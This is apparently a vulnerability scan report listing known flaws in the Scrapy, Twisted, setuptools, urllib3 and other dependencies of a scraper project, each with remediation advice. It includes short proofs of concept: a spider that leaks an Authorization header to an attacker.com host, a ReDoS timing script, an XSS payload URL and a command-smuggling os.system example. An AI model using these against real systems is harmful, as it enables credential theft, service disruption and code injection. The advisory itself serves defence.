ZoranPandovski/ProdirectScraper:requirements.txt
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Improper Resource Shutdown or Release because response size limits are enforced only during the download of the raw, usually-compressed response body, not during decompression. A malicious website being scraped could send a small response that, on decompression, exhausts the memory available to the process, potentially affecting any other process sharing that memory, and increasing disk usage when uncompressed responses are cached.
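For context, a hedged sketch of the relevant knobs (assumed example limits, not this project's settings): Scrapy's DOWNLOAD_MAXSIZE and DOWNLOAD_WARNSIZE cap response sizes, but in affected versions the check ran against the compressed body only.
# settings.py: illustrative limits only.
# In affected Scrapy versions these limits were enforced before
# decompression, so a tiny compressed body could still expand far
# past them in memory.
DOWNLOAD_MAXSIZE = 10 * 1024 * 1024   # abort downloads larger than 10 MB
DOWNLOAD_WARNSIZE = 1 * 1024 * 1024   # log a warning above 1 MB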
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization header when redirecting across domains. An attacker can potentially hijack accounts by exploiting the exposure of the Authorization header to unauthorized actors.
PoC
import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"

    def start_requests(self):
        urls = [
            'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
        ]
        for url in urls:
            # In affected versions the Authorization header survives the
            # cross-domain redirect, leaking the credentials to attacker.com.
            yield scrapy.Request(
                url=url,
                cookies={'currency': 'USD', 'country': 'UY'},
                headers={'Authorization': 'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},
                callback=self.parse,
            )

    def parse(self, response):
        page = response.url.split("/")[-2]
        filename = f'quotes-{page}.html'
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log(f'Saved file {filename}')
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request carrying the Authorization header to a different domain.
Workarounds
1) Make sure the Authorization header is not used, either directly or through some third-party plugin.
2) If that header is needed in some requests, add dont_redirect: True to the request.meta dictionary of those requests to disable following redirects for them (see the sketch below).
3) If same-domain redirect support is needed on those requests, make sure you trust the target website not to redirect your requests to a different domain.
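A minimal sketch of workaround 2, assuming a placeholder spider name, URL, and token; dont_redirect is the meta key honored by Scrapy's RedirectMiddleware:
import scrapy

class AuthSpider(scrapy.Spider):
    # Hypothetical spider, for illustration only.
    name = "auth_example"

    def start_requests(self):
        yield scrapy.Request(
            url="https://api.example.com/private",        # placeholder URL
            headers={"Authorization": "Bearer <token>"},  # placeholder token
            # Disable redirect handling for this request so the
            # Authorization header cannot follow a redirect elsewhere.
            meta={"dont_redirect": True},
            callback=self.parse,
        )

    def parse(self, response):
        self.log(f"Got {response.status} from {response.url}")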
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@1.8.4.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider class or any subclass that uses the default node iterator iternodes, as well as direct uses of the scrapy.utils.iterators.xmliter function. An attacker can cause extreme CPU and memory usage during parsing by serving a malicious response.
Note: For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser for a response without a base tag.
Workaround
- For XMLFeedSpider, switch the node iterator to xml or html (see the sketch below).
- For open_in_browser, before using the function, either manually review the response content to rule out a ReDoS attack, or manually define the base tag to avoid its automatic definition by open_in_browser later.
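A minimal sketch of the XMLFeedSpider workaround, with a placeholder feed URL and item tag; iterator and itertag are standard XMLFeedSpider attributes:
from scrapy.spiders import XMLFeedSpider

class SafeFeedSpider(XMLFeedSpider):
    # Hypothetical feed spider, for illustration only.
    name = "safe_feed"
    start_urls = ["https://example.com/feed.xml"]  # placeholder URL
    iterator = "xml"   # lxml-based iterator instead of the regex-based
                       # default, 'iternodes'
    itertag = "item"

    def parse_node(self, response, node):
        yield {"title": node.xpath("title/text()").get()}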
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'.
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this group states that we can look for one or more matches of the group.
- D: Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, roughly 35 times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can make regex engines work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.
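Since this report concerns Python packages, the same blow-up can be reproduced with Python's re module (a quick demo; exact timings vary by machine):
import re
import time

pattern = re.compile(r'A(B|C+)+D')

for n in (20, 22, 24, 26):
    s = 'A' + 'C' * n + 'X'    # non-matching input forces backtracking
    start = time.time()
    pattern.search(s)          # each extra 'C' roughly doubles the time
    print(n, round(time.time() - start, 3), 'seconds')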
Remediation
Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.
high severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.11.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker can cause extreme CPU and memory usage by serving a malicious response.
PoC
import re
import time
import math

def convert_size(size_bytes):
    if size_bytes == 0:
        return "0B"
    size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return "%s %s" % (s, size_name[i])

# Closing-tag regex; every '</' without a matching '>' forces backtracking.
END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)

len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]
for n in len_lists:
    st = time.time()
    header_end = '</' * n
    re.findall(END_TAG_RE, header_end)
    et = time.time()
    elapsed_time = et - st
    print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}: {elapsed_time} seconds')
Details
See the Regular Expression Denial of Service (ReDoS) explanation under the first ReDoS issue above; the details are identical.
Remediation
Upgrade Scrapy to version 2.11.1 or higher.
high severity
- Vulnerable module: setuptools
- Introduced through: mock@2.0.0, twisted@23.8.0 and others
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › mock@2.0.0 › pbr@6.1.1 › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › zope.interface@6.4.post2 › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
…and 1 more
Overview
Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.
Note: Because easy_install and package_index are deprecated, the exploitation surface is reduced; still, it is conceivable that social engineering or a minor compromise of a package index could grant remote access.
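To illustrate the bug class (a generic sketch, not the actual setuptools code): interpolating an attacker-controlled URL into a shell command lets shell metacharacters execute, while passing it as a list argument does not.
import os
import subprocess

url = "http://example.com/pkg.tar.gz; touch /tmp/pwned"  # attacker-controlled

# Vulnerable pattern: the string is handed to a shell, so everything
# after ';' runs as a second command.
os.system("wget " + url)

# Safer pattern: arguments are passed as a list and never shell-parsed.
subprocess.run(["wget", url], check=False)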
Remediation
Upgrade setuptools to version 70.0.0 or higher.
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0
  Remediation: Upgrade to twisted@24.7.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0
  Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
medium severity
- Vulnerable module: zipp
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
  Remediation: Upgrade to twisted@23.8.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › service-identity@21.1.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
  Remediation: Upgrade to scrapy@1.8.4.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › attrs@24.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0
  Remediation: Upgrade to scrapy@1.8.2.
Overview
Affected versions of this package are vulnerable to Infinite Loop. An attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.
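For context, a minimal sketch of the affected zipp.Path entry points, using a small in-memory archive; a crafted archive could make these same calls loop forever in affected versions:
import io
import zipfile
import zipp

# Build a tiny archive in memory for illustration.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("dir/file.txt", "hello")

root = zipp.Path(zipfile.ZipFile(buf))
child = root.joinpath("dir")                # affected function
same = root / "dir"                         # affected overloaded operator
print([p.name for p in child.iterdir()])    # affected function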
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
- High CPU/Memory Consumption: An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
- Crash: An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.
Remediation
Upgrade zipp to version 3.19.1 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS setting. An attacker can redirect traffic to unintended protocols such as file:// or s3://, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing its output.
Notes:
- HTTP redirects should only work between URLs that use the http:// or https:// schemes.
- A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:
  a) Redirect to any local file using the file:// scheme to read its contents.
  b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.
  c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.
- A spider that always outputs the entire contents of a response would be completely vulnerable; a spider that extracts only fragments from the response could significantly limit the exposed data. A hardening sketch follows below.
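A hedged hardening sketch (project-specific; keep only the handlers this spider actually needs): Scrapy lets you disable a download handler by mapping its scheme to None, so redirects to those schemes simply fail.
# settings.py: illustrative hardening, not the upstream fix.
DOWNLOAD_HANDLERS = {
    "file": None,  # block file:// reads of local files
    "ftp": None,   # block ftp:// credential exposure
    "s3": None,    # block s3:// access with configured credentials
}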
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
medium severity
- Vulnerable module: urllib3
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0 › urllib3@2.0.7
  Remediation: Upgrade to scrapy@2.0.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0 › urllib3@2.0.7
  Remediation: Upgrade to scrapy@2.0.0.
Overview
urllib3 is an HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization header during cross-origin redirects when ProxyManager is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.
Notes:
To be vulnerable, the application must be doing all of the following:
- Setting the Proxy-Authorization header without using urllib3's built-in proxy support.
- Not disabling HTTP redirects (e.g. with redirects=False).
- Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.
Workarounds (see the sketch below):
- Use the Proxy-Authorization header with urllib3's ProxyManager.
- Disable HTTP redirects using redirects=False when sending requests.
- Do not use the Proxy-Authorization header.
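A minimal sketch of the first two workarounds with placeholder hosts and credentials; note that urllib3's keyword argument for disabling redirects is redirect:
import urllib3

# Workaround 1: let ProxyManager attach proxy credentials itself instead
# of setting the Proxy-Authorization header manually.
proxy = urllib3.ProxyManager(
    "http://proxy.example.com:8080",  # placeholder proxy
    proxy_headers=urllib3.make_headers(proxy_basic_auth="user:pass"),
)
resp = proxy.request("GET", "http://example.com/")

# Workaround 2: disable automatic redirects so a header cannot be
# replayed to a redirect target.
http = urllib3.PoolManager()
resp = http.request("GET", "http://example.com/", redirect=False)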
Remediation
Upgrade urllib3 to version 1.26.19, 2.2.2 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.
Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure: a spider could leak cookie headers when requests are forwarded to a third-party, potentially attacker-controlled website.
Remediation
Upgrade Scrapy to version 2.6.0 or higher.
medium severity
- Vulnerable module: setuptools
- Introduced through: mock@2.0.0, twisted@23.8.0 and others
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › mock@2.0.0 › pbr@6.1.1 › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › zope.interface@6.4.post2 › setuptools@40.5.0
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0 › zope-interface@? › setuptools@40.5.0
…and 1 more
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via a crafted HTML package page or a custom PackageIndex page.
Note: Only a small portion of the user base is impacted by this flaw. The setuptools maintainers point out that package_index is deprecated (not formally, but "in spirit") and that the vulnerability isn't reachable through standard, recommended workflows.
Details
See the Regular Expression Denial of Service (ReDoS) explanation under the first ReDoS issue above; the details are identical.
Remediation
Upgrade setuptools to version 65.5.1 or higher.
medium severity
- Vulnerable module: requests
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0
  Remediation: Upgrade to scrapy@2.0.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0
  Remediation: Upgrade to scrapy@2.0.0.
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.
Notes (see the sketch below):
- For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.
- For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.
- This vulnerability was initially fixed in version 2.32.0, which was yanked; therefore, the next available fixed version is 2.32.2.
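A minimal sketch of the vulnerable pattern and the mitigation, with a placeholder host:
import requests

session = requests.Session()

# First request disables verification; affected versions cache the pooled
# connection without accounting for the verify flag.
session.get("https://example.com/", verify=False)

# In requests <2.32.0 this call may silently reuse the unverified
# connection even though verify defaults back to True.
session.get("https://example.com/")

# Mitigation on affected versions: drop the pooled connections.
session.close()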
Remediation
Upgrade requests to version 2.32.2 or higher.
medium severity
- Vulnerable module: lxml
- Introduced through: lxml@4.6.5 and scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › lxml@4.6.5
  Remediation: Upgrade to lxml@4.9.1.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › lxml@4.6.5
  Remediation: Upgrade to scrapy@1.8.4.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › parsel@1.8.1 › lxml@4.6.5
Overview
Affected versions of this package are vulnerable to NULL Pointer Dereference in the iterwalk() function (used by canonicalize()) that can be triggered by malicious input.
NOTE: This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14.
Details
See the Denial of Service (DoS) explanation under the zipp issue above; the details are identical.
Remediation
Upgrade lxml to version 4.9.1 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@1.8.3.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Credential Exposure via the process_request() function in downloadermiddlewares/httpproxy.py. A proxy can leak credentials to another proxy if third-party downloader middlewares leave Proxy-Authorization headers unchanged when updating proxy metadata for a new request (see the sketch below).
NOTE: To fully mitigate the effects of this vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.
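A hedged sketch of what that guidance means for a hypothetical third-party middleware that switches proxies:
class ProxySwitchMiddleware:
    # Hypothetical downloader middleware, for illustration only.
    NEW_PROXY = "http://other-proxy.example.com:8080"

    def process_request(self, request, spider):
        if request.meta.get("proxy") != self.NEW_PROXY:
            request.meta["proxy"] = self.NEW_PROXY
            # Drop stale credentials so they cannot leak to the new
            # proxy; HttpProxyMiddleware can then set fresh ones.
            request.headers.pop(b"Proxy-Authorization", None)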
Remediation
Upgrade Scrapy to version 1.8.3, 2.6.2 or higher.
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0
  Remediation: Upgrade to twisted@23.10.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0
  Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted to version 23.10.0rc1 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
Overview
Affected versions of this package are vulnerable to excessive memory consumption via S3FilesStore: files are stored in memory before being uploaded to S3, increasing memory usage when very large files, or many files, are uploaded at the same time.
medium severity
- Vulnerable module: twisted
- Introduced through: twisted@23.8.0 and scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › twisted@23.8.0
  Remediation: Upgrade to twisted@24.7.0.
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › twisted@23.8.0
  Remediation: Upgrade to scrapy@1.8.2.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo() function. A site which is vulnerable to open redirects by other means can be made to execute scripts injected into a redirect URL.
PoC
http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they've been correctly escaped in the application code, and in this way the attempted attack is diverted.
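For instance, Python's standard html.escape neutralizes a payload like the one in the PoC above:
import html

payload = '"><script>alert(document.location)</script>'
print(html.escape(payload))
# &quot;&gt;&lt;script&gt;alert(document.location)&lt;/script&gt;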
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL-encoded equivalents.
- Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
